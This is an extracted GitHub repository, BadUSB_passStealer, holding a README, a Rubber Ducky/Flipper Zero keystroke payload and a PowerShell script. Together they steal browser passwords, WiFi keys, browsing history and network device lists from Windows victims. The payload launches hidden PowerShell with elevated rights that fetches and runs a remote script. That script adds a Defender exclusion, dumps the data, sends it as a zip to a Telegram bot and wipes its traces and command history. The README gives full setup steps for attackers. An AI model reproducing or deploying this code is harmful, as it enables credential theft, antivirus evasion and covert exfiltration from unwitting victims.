Repository: tuconnaisyouknow/BadUSB_passStealer
Branch: main
Commit: 15c75a73a047
Files: 4
Total size: 10.8 KB
Directory structure:
gitextract_ugr1m322/
├── LICENSE
├── README.md
└── upload/
├── BadUSB_passStealer_upload.txt
└── ps.ps1
================================================
FILE CONTENTS
================================================
================================================
FILE: LICENSE
================================================
MIT License
Copyright (c) 2022 elliotYouKnow
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
================================================
FILE: README.md
================================================
# 💀 BadUSB_passStealer
## ⚠️ Warning
Everything in this repository is **strictly** for educational purposes. **I am not responsible** for any stolen data. **You are responsible** for your actions when using this script for **BadUSB**.
## ℹ️ About
This **script** allows you to steal the following **information**:
🔹 Browser **passwords** (Chrome, Firefox, Opera)
🔹 **WiFi** passwords
🔹 Browser **history** from the last 7 days
🔹 A **list** of all **devices** connected to the victim's network
## 🔑 Key Information for Users
### ⚠️ MalDuino & Rubber Ducky Users
You **must** replace **`CTRL-SHIFT ENTER`** with **`CTRL SHIFT ENTER`** in the [`ps.ps1`](https://github.com/tuconnaisyouknow/BadUSB_passStealer/blob/main/upload/ps.ps1) file.
✅ **Flipper Zero users**, no changes are needed—this syntax is already compatible.
### ⚠️ Arduino Users
🚫 I **stopped upgrading** `.ino` scripts. If you need them, you can **convert Ducky Scripts** [here](https://duckify.huhn.me/).
### 🕒 Adjusting Delay
You can customize the **delays** based on the **speed** of the **target machine**.
### ⏳ Waiting for Execution
When you plug the **BadUSB** into a PC, **wait for the Caps Lock to flash** before unplugging it.
---
# 🚀 Getting Started
## 📌 Requirements
✔️ A **BadUSB**
✔️ Install **Arduino software** [here](https://www.arduino.cc/en/software) *(if using an Arduino-based BadUSB)*
✔️ A **Telegram account**
✔️ A **victim using Windows 10/11**
---
# 🤖 Setting up a Telegram Bot for Uploading Files
## 1️⃣ Create a Telegram Bot
1️⃣ Open [Telegram Web](https://web.telegram.org/) and log in.
2️⃣ Search for **@BotFather** in the Telegram search bar.
3️⃣ Click **Start** to begin a conversation.
4️⃣ Send `/newbot`.
5️⃣ Choose a bot **name** and send it.
6️⃣ Choose a bot **username** and send it.
7️⃣ **@BotFather** will provide an API token:
> Done! Congratulations on your new bot. You will find it at t.me/BOT_USERNAME. You can now add a description, about section, and profile picture for your bot. See /help for a list of commands.
> Use this token to access the HTTP API:
> **API_ACCESS_TOKEN**
> For a description of the Bot API, see this page: https://core.telegram.org/bots/api
8️⃣ Start a chat with your bot by clicking **t.me/BOT_USERNAME** and pressing **Start**.
## 2️⃣ Get Your Telegram API Token
Your **API token** is provided in **@BotFather**'s response.
## 3️⃣ Get Your Telegram Chat ID
1️⃣ Open your browser and replace `API_ACCESS_TOKEN` in this URL:
```
https://api.telegram.org/bot<API_ACCESS_TOKEN>/getUpdates?offset=0
```
2️⃣ Send a **test message** to your bot on Telegram.
3️⃣ Refresh the API page.
4️⃣ Find your **chat ID** in the response JSON. Example:
```
"chat":{"id":123456789,"type":"private"}
```
Your chat ID is **123456789**.
---
# ⚙️ Installation for Rubber Ducky, Malduino W, and Flipper Zero
1️⃣ **Download this repository**
🔹 **Linux:**
```bash
git clone https://github.com/tuconnaisyouknow/BadUSB_passStealer
cd BadUSB_passStealer
```
🔹 **Windows:**
- Click the **green "Code" button** at the top right.
- Click **"Download ZIP"** and extract it.
2️⃣ Replace **`<TOKEN>`** and **`<CHAT_ID>`** in [`ps.ps1`](https://github.com/tuconnaisyouknow/BadUSB_passStealer/blob/main/upload/ps.ps1).
3️⃣ **Upload `ps.ps1` to get a downloadable link**.
4️⃣ Replace **`LINK`** in [`BadUSB_passStealer_upload.txt`](https://github.com/tuconnaisyouknow/BadUSB_passStealer/blob/main/upload/BadUSB_passStealer_upload.txt) with the `ps.ps1` link.
5️⃣ Place the `.txt` file in your **BadUSB**.
6️⃣ **Find a victim and enjoy!** 🎭
---
# 🛠️ NirSoft Tools
🔗 You can download NirSoft tools here:
🔹 **[WebBrowserPassView.exe](https://www.nirsoft.net/protected_downloads/passreccommandline.zip)** *(User: `download` | Password: `nirsoft123!`)*
🔹 **[WNetWatcher.exe](https://www.nirsoft.net/utils/wireless_network_watcher.html)**
🔹 **[BrowsingHistoryView.exe](https://www.nirsoft.net/utils/browsing_history_view.html)**
🔹 **[WirelessKeyView.exe](https://www.nirsoft.net/utils/wireless_key.html)**
================================================
FILE: upload/BadUSB_passStealer_upload.txt
================================================
REM _
REM _ _ ___ _ _ | | ___ __ _____ __
REM | | | |/ _ \| | | | | |/ / _ \ / _ \ \ /\ / /
REM | |_| | (_) | |_| |_| <| | | | (_) \ V V /
REM \__, |\___/ \__,_(_)_|\_\_| |_|\___/ \_/\_/
REM |___/
REM ###########################################################
REM # #
REM # Title : BadUSB_passStealer #
REM # Author : you.know #
REM # Version : 2.0 #
REM # Category : Data Exfiltration, Credential Dumping #
REM # Target : Windows 10/11 #
REM # #
REM # Description: #
REM # - Launches PowerShell in hidden mode #
REM # - Extracts browser passwords and WiFi credentials #
REM # - Saves them as .txt files #
REM # - Exfiltrates the data via Telegram #
REM # - Cleans up traces after execution #
REM # #
REM ###########################################################
REM Initial delay to ensure the system is ready
DELAY 2500
REM Minimize all active windows
GUI d
DELAY 500
REM Open Run dialog
GUI r
DELAY 500
REM Execute PowerShell hidden with administrative privileges
STRING powershell -w h -NoP -Ep Bypass -Command "irm <LINK> | iex"
CTRL-SHIFT ENTER
DELAY 1000
LEFT
DELAY 500
ENTER
REM Flash CAPSLOCK as an indicator that execution is complete
CAPSLOCK
DELAY 500
CAPSLOCK
DELAY 500
CAPSLOCK
DELAY 500
CAPSLOCK
================================================
FILE: upload/ps.ps1
================================================
# _
# _ _ ___ _ _ | | ___ __ _____ __
# | | | |/ _ \| | | | | |/ / _ \ / _ \ \ /\ / /
# | |_| | (_) | |_| |_| <| | | | (_) \ V V /
# \__, |\___/ \__,_(_)_|\_\_| |_|\___/ \_/\_/
# |___/
$basePath = "C:\Users\Public\Documents\scripts"
$dumpFolder = "$basePath\$env:USERNAME-$(get-date -f yyyy-MM-dd)"
$dumpFile = "$dumpFolder.zip"
# Create directory
New-Item -ItemType Directory -Path $basePath -Force | Out-Null
Set-Location $basePath
New-Item -ItemType Directory -Path $dumpFolder -Force | Out-Null
Add-MpPreference -ExclusionPath $basePath -Force
# Download necessary tools
Invoke-WebRequest https://github.com/tuconnaisyouknow/BadUSB_passStealer/blob/main/other_files/WirelessKeyView.exe?raw=true -OutFile WirelessKeyView.exe
Invoke-WebRequest https://github.com/tuconnaisyouknow/BadUSB_passStealer/blob/main/other_files/WebBrowserPassView.exe?raw=true -OutFile WebBrowserPassView.exe
Invoke-WebRequest https://github.com/tuconnaisyouknow/BadUSB_passStealer/blob/main/other_files/BrowsingHistoryView.exe?raw=true -OutFile BrowsingHistoryView.exe
Invoke-WebRequest https://github.com/tuconnaisyouknow/BadUSB_passStealer/blob/main/other_files/WNetWatcher.exe?raw=true -OutFile WNetWatcher.exe
# Execute tools to gather data
.\WNetWatcher.exe /stext connected_devices.txt
.\BrowsingHistoryView.exe /VisitTimeFilterType 3 7 /stext history.txt
.\WebBrowserPassView.exe /stext passwords.txt
.\WirelessKeyView.exe /stext wifi.txt
# Wait for the files to be fully written
while (!(Test-Path "passwords.txt") -or !(Test-Path "wifi.txt") -or !(Test-Path "connected_devices.txt") -or !(Test-Path "history.txt")) {
Start-Sleep -Seconds 1
}
Move-Item passwords.txt, wifi.txt, connected_devices.txt, history.txt -Destination "$dumpFolder"
# Compress extracted data
Compress-Archive -Path "$dumpFolder\*" -DestinationPath "$dumpFile" -Force
# Wait until the ZIP file is created
while (!(Test-Path "$dumpFile")) {
Start-Sleep -Seconds 1
}
# Telegram configuration
$token = "<TOKEN>"
$chatID = "<CHATID>"
$uri = "https://api.telegram.org/bot$token/sendDocument"
$caption = "Here are exfiltrated informations from $env:USERNAME"
# Check if the file exists before sending
if (!(Test-Path $dumpFile)) {
exit 1
}
# Ensure System.Net.Http is available
if (-not ("System.Net.Http.HttpClient" -as [type])) {
$httpPath = Get-ChildItem -Path "C:\Windows\Microsoft.NET\Framework64\" -Recurse -Filter "System.Net.Http.dll" | Select-Object -First 1 -ExpandProperty FullName
if ($httpPath) {
Add-Type -Path $httpPath
} else {
exit 1
}
}
# Create HTTP client
$client = New-Object System.Net.Http.HttpClient
$content = New-Object System.Net.Http.MultipartFormDataContent
$content.Add((New-Object System.Net.Http.StringContent($chatID)), "chat_id")
$content.Add((New-Object System.Net.Http.StringContent($caption)), "caption")
# Attach the ZIP file
$filename = [System.IO.Path]::GetFileName("$dumpFile")
$fileStream = [System.IO.File]::OpenRead("$dumpFile")
$fileContent = New-Object System.Net.Http.StreamContent($fileStream)
$fileContent.Headers.ContentType = [System.Net.Http.Headers.MediaTypeHeaderValue]::Parse("application/octet-stream")
$content.Add($fileContent, "document", $filename)
# Send data to Telegram
try {
$client.PostAsync($uri, $content).Wait()
} catch {}
# Cleanup
$fileStream.Close()
$fileStream.Dispose()
Set-Location C:\Users\Public\Documents
Remove-Item -Recurse -Force scripts
Remove-MpPreference -ExclusionPath "C:\Users\Public\Documents\scripts" -Force
# Caps Lock signal
$keyBoardObject = New-Object -ComObject WScript.Shell
for ($i=0; $i -lt 4; $i++) {
$keyBoardObject.SendKeys("{CAPSLOCK}")
Start-Sleep -Seconds 1
}
# Clear command history
Clear-Content (Get-PSReadlineOption).HistorySavePath
exit
gitextract_ugr1m322/
├── LICENSE
├── README.md
└── upload/
├── BadUSB_passStealer_upload.txt
└── ps.ps1
Condensed preview — 4 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (12K chars).
[
{
"path": "LICENSE",
"chars": 1070,
"preview": "MIT License\n\nCopyright (c) 2022 elliotYouKnow\n\nPermission is hereby granted, free of charge, to any person obtaining a c"
},
{
"path": "README.md",
"chars": 4199,
"preview": "# 💀 BadUSB_passStealer\n\n## ⚠️ Warning \nEverything in this repository is **strictly** for educational purposes. **I am n"
},
{
"path": "upload/BadUSB_passStealer_upload.txt",
"chars": 1835,
"preview": "REM _ \r\nREM _ _ ___ _ _ | | ___ __ _____ __\r\nREM | | | |/ _ \\"
},
{
"path": "upload/ps.ps1",
"chars": 3986,
"preview": "# _ \r\n# _ _ ___ _ _ | | ___ __ _____ __\r\n# | | | |/ _ \\| | | "
}
]
About this extraction
This page contains the full source code of the tuconnaisyouknow/BadUSB_passStealer GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 4 files (10.8 KB), approximately 3.0k tokens. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.